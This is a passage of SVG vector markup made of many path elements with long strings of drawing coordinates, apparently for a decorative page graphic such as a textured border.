.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path 